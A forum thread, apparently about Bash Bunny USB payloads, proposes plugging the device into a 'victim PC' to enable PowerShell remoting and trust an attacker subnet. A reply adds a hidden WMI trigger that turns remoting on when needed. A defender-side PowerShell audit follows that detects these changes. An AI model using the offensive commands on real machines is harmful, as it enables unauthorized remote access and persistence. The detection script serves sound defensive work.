
Remote Exec via PS (Payload Idea)


Dave-ee Jones


Hoi!

So here's a quick payload idea...

Plug BB into victim PC and enable remote connection on PS:

# Start WinRM, register the HTTP listener and open the firewall rule
Enable-PSRemoting -Force
# Client-side list of hosts this machine will connect to without Kerberos (the item is named TrustedHosts)
Set-Item WSMan:\localhost\Client\TrustedHosts "172.16.16.*"

Head to another PC and launch remote PS commands (your laptop on the same network, maybe?):

Enter-PSSession -ComputerName "George"

Might work on the payload tomorrow or something, get a quick version going. I just posted to see what others could come up with or just have a Devil's Advocate try and stump me (probably not hard in this case).


Hmm, been a while since I enabled PSRemoting. I do not recall, but after enabling does the machine usually require a reboot?

If not, there is actually an even more hidden idea. WMI trigger to enable PSRemoting and allow your IP when some external event that you can control happens on the network or with a service on the machine.

Use the Bunny to create the trigger and now there is no PSRemote port open. Trigger the WMI event from another machine so PSRemoting is enabled and then connect. When done you may have an event to shut it back down too.

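As an added example that is not part of this thread, here is a defender-side PowerShell audit that reports the state the two posts above would leave on a host: WinRM running, a populated TrustedHosts, active listeners and firewall rules, and any permanent WMI event subscriptions (the trigger mechanism suggested in the reply). It assumes it is run in an elevated session on the host being checked; the function name is my own.

```powershell
# Added defender-side audit (not part of the thread). Run elevated on the
# host being checked. Reports what the payload idea above leaves behind:
# WinRM running, a TrustedHosts entry, listeners/firewall rules, and
# permanent WMI event subscriptions (the trigger mechanism in the reply).
function Get-RemotingExposure {
    $report = [ordered]@{}

    # 1. WinRM service state and start type.
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $report.WinRMStatus    = if ($svc) { $svc.Status } else { 'NotInstalled' }
    $report.WinRMStartType = if ($svc) { $svc.StartType } else { 'n/a' }

    # 2. Client-side TrustedHosts (empty is the default). The WSMan: drive
    #    is only reachable while the WinRM service is running.
    try {
        $report.TrustedHosts = (Get-Item WSMan:\localhost\Client\TrustedHosts -ErrorAction Stop).Value
    } catch { $report.TrustedHosts = '<unavailable: WinRM not running>' }

    # 3. Listeners (Enable-PSRemoting creates an HTTP listener on TCP 5985).
    try {
        $report.Listeners = @(Get-ChildItem WSMan:\localhost\Listener -ErrorAction Stop |
            ForEach-Object { $_.Name })
    } catch { $report.Listeners = @() }

    # 4. Enabled firewall rules in the Windows Remote Management group.
    $report.OpenWinRMRules = @(Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
        Where-Object { $_.Enabled -eq 'True' } | Select-Object -ExpandProperty DisplayName)

    # 5. Permanent WMI subscriptions: a filter bound to a consumer survives
    #    reboots and fires without any port being open beforehand.
    $ns = 'root\subscription'
    $report.WmiFilters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter |
        Select-Object Name, Query)
    $report.WmiConsumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer |
        Select-Object Name, @{ n = 'Type'; e = { $_.CimClass.CimClassName } })
    $report.WmiBindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Select-Object Filter, Consumer)

    [pscustomobject]$report
}

Get-RemotingExposure | Format-List

# Triage: a populated TrustedHosts on a workstation, a listener where remoting
# is not expected, or a binding other than the stock "SCM Event Log" pair
# warrants a look at the Microsoft-Windows-WinRM/Operational log and Security
# events 4624 (logon type 3) around the time the change appeared.
```

Running this periodically and diffing the output against a known-good baseline turns both the PSRemoting toggle and the WMI trigger into a detectable change rather than a silent one.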
